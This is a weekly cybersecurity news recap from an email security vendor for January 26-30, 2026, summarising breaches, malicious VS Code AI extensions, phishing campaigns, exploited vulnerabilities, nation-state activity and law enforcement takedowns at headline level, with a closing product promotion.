WEEKLY CYBERSECURITY RECAP: January 26-30, 2026

By SO Email Security5 min read

This week's top cybersecurity news: Match Group breach exposes dating app users, malicious VS Code AI extensions steal code, FBI seizes RAMP forum, record-breaking DDoS attack, and more.

cybersecurity newsweekly recapdata breachransomwarephishingmalwarethreat intelligencesecurity news

Weekly Cybersecurity Recap: January 26-30, 2026

Your essential roundup of the week's most significant cybersecurity developments.

This week brought major data breaches affecting hundreds of millions of users, a record-shattering DDoS attack, law enforcement victories against cybercrime forums, and growing concerns about malicious AI tools infiltrating developer environments.

Major data breaches

Match Group breach exposes dating app users

A significant breach at Match Group has exposed user data from multiple popular dating platforms including Hinge, Tinder, OKCupid, and Match.com. The full scope of compromised data is still being assessed, but the incident highlights the sensitive nature of dating app information and the cascading impact when a parent company is breached.

SoundCloud breach impacts 298 Million accounts

Have I Been Pwned has added the SoundCloud data breach to its database, confirming that 298 million accounts were compromised. Users of the audio streaming platform should assume their account information has been exposed and take appropriate protective measures.

Nike hit by worldleaks extortion group

The extortion group Worldleaks claims to have stolen 1.4 terabytes of data from Nike. Dark Reading reports the group is threatening to release the data unless their demands are met, adding another major brand to the growing list of corporate extortion victims.

France fines unemployment agency €5 Million

French authorities have fined the national unemployment agency €5 million following a data breach that exposed citizen information. The penalty underscores the regulatory consequences organizations face when failing to adequately protect personal data.

Malware and ransomware developments

Malicious VS code AI extensions compromise 1.5 Million developers

In one of the week's most alarming discoveries, security researchers identified malicious AI coding assistant extensions on the Visual Studio Code marketplace that had accumulated over 1.5 million installations. The extensions were designed to steal developer source code, potentially exposing proprietary codebases and sensitive intellectual property across thousands of organizations.

Fake MoltBot AI assistant raises alarms

A fraudulent AI coding assistant called "MoltBot" has been distributed through the VS Code marketplace, raising concerns about the security of AI development tools. The incident highlights the growing trend of attackers exploiting trust in AI assistants to distribute malware.

Aisuru Botnet sets DDoS record at 3.14 Tbps

The Aisuru botnet has achieved a new record for distributed denial-of-service attacks, generating an unprecedented 3.14 terabits per second of malicious traffic. This milestone demonstrates the escalating scale of DDoS capabilities and the threat they pose to online infrastructure.

Hugging face abused for Android malware distribution

Attackers have weaponized the popular AI model repository Hugging Face to distribute thousands of Android malware variants. The abuse of trusted AI platforms for malware delivery represents an emerging threat vector that organizations must monitor.

Phantom malware hides in Android game mods

A new malware strain dubbed "Phantom" has been discovered hiding within Android game modifications, conducting ad fraud operations at scale. Users downloading unofficial game mods are particularly at risk.

Sicarii ransomware decrypted

Security researchers have successfully decrypted the "vibe-coded" Sicarii ransomware, offering potential relief to victims. The ransomware had employed unconventional coding techniques that initially complicated analysis.

Phishing and social engineering

Tax season phishing campaigns intensify

As tax season approaches globally, phishing campaigns are ramping up:

  • Indian users are being targeted with tax-themed phishing emails delivering Blackmoon malware
  • Fake Microsoft Teams billing alerts are being used to harvest corporate credentials
  • Fraudulent ChatGPT browser extensions are hijacking user accounts

ClickFix attacks expand with new techniques

ClickFix attacks have evolved to abuse Windows App V scripts for malware delivery. The technique uses fake error messages to trick users into executing malicious PowerShell commands, bypassing traditional security controls.

Chrome web store infiltrated by malware service

A new malware-as-a-service operation now guarantees placement of phishing extensions on the Chrome Web Store, according to BleepingComputer. The service highlights the ongoing challenge of securing browser extension marketplaces.

Stanley toolkit enables undetectable Chrome phishing

Dark Reading reports on a new toolkit called "Stanley" that creates undetectable phishing attacks through Chrome, making it increasingly difficult for users to identify malicious sites.

Critical vulnerabilities

Ivanti EPMM zero-days under active exploitation

Two critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited for remote code execution. Organizations using Ivanti products should apply patches immediately.

SolarWinds web help desk flaws disclosed

SolarWinds has issued warnings about critical RCE and authentication bypass vulnerabilities in Web Help Desk. Given SolarWinds' history as a target, these flaws demand urgent attention.

WinRAR vulnerability still being exploited

Despite patches being available for months, the WinRAR path traversal vulnerability continues to be exploited by numerous threat actors. Small and medium businesses appear to be hit hardest by ongoing attacks.

Fortinet discloses new zero-day

Fortinet has revealed a new zero-day vulnerability enabling malicious SSO logins. The company is urging customers to apply mitigations immediately.

Nearly 800,000 telnet servers exposed

Researchers have identified nearly 800,000 Telnet servers exposed to remote attacks, representing a massive forgotten attack surface that threat actors can exploit.

Nation-state activity

Chinese APTs deploy high-end malware across Asia

Chinese advanced persistent threat groups are targeting Asian organizations with sophisticated, high-end malware designed for long-term espionage operations.

PeckBirdy campaign linked to China

A cross-platform attack campaign dubbed "PeckBirdy" has been attributed to China-backed threat actors, targeting multiple operating systems simultaneously.

Mustang Panda updates Arsenal

The Mustang Panda APT group has deployed updated malware variants, continuing its campaigns against government and diplomatic targets.

Konni hackers leverage AI-generated content

The Konni threat group is now using AI-generated content to enhance their social engineering campaigns, marking another example of threat actors adopting generative AI.

Russian electrum group linked to December attacks

New analysis ties the Russian threat actor "Electrum" to cyberattacks in December 2025, expanding understanding of their operational timeline.

Poland thwarts Russian wiper attack on power plants

Polish authorities have successfully defended against a Russian wiper malware attack targeting approximately 30 power facilities, preventing potentially significant infrastructure damage.

Law enforcement actions

FBI seizes RAMP cybercrime forum

The FBI has seized the RAMP cybercrime forum, a Russian-language marketplace used by ransomware gangs to recruit affiliates and trade access. The takedown disrupts a key node in the ransomware ecosystem.

Kingdown market operator pleads guilty

A Slovakian man has pleaded guilty to operating the Kingdown cybercrime marketplace, which facilitated the sale of stolen credentials and malware.

31 Suspects charged in ATM jackpotting scheme

U.S. authorities have charged 31 additional suspects in connection with ATM malware attacks, expanding one of the largest prosecutions of jackpotting operations.

Platform and infrastructure security

WhatsApp introduces lockdown feature

WhatsApp has rolled out a new "lockdown" security feature designed to block cyberattacks and protect user accounts from compromise.

Microsoft Teams adds suspicious call reporting

A new Microsoft Teams feature will allow users to report suspicious calls, helping organizations identify and respond to voice-based social engineering attempts.

Google disrupts IPIDEA proxy network

Google has disrupted the IPIDEA residential proxy network, which was being fueled by malware-infected devices and used to mask malicious traffic.

npm security defenses bypassable

Security researchers have discovered that npm's "Shai-Hulud" security defenses can be bypassed via Git dependencies, potentially allowing malicious packages to evade detection.

Key takeaways this week

  1. AI development tools are under attack: Multiple incidents involving malicious VS Code extensions and fake AI assistants demonstrate that developer environments are high-value targets.

  2. Tax season phishing is global: From India to the U.S., threat actors are exploiting tax anxiety with localized phishing campaigns.

  3. Record-breaking attacks continue: The 3.14 Tbps DDoS attack shows threat actors are scaling their capabilities faster than many defenses can adapt.

  4. Legacy vulnerabilities persist: The ongoing exploitation of the WinRAR flaw months after patching highlights the challenge of vulnerability management.

  5. Law enforcement is making progress: The RAMP forum seizure and multiple arrests show that coordinated action against cybercrime infrastructure can succeed.

Sources

This weekly recap aggregates reporting from leading cybersecurity news sources:

We acknowledge and thank these publications for their essential cybersecurity journalism.

Protect your organization

Email remains the primary attack vector for phishing, malware delivery, and business email compromise. As this week's news demonstrates, threats are evolving rapidly across every sector.

Stay protected with SO Email Security. Our AI-powered email protection detects and blocks phishing attempts, malicious attachments, and impersonation attacks before they reach your inbox.

Learn more at soemailsecurity.com

This recap is provided for educational purposes by SO Email Security. For the latest threat intelligence and protection, subscribe to our weekly newsletter.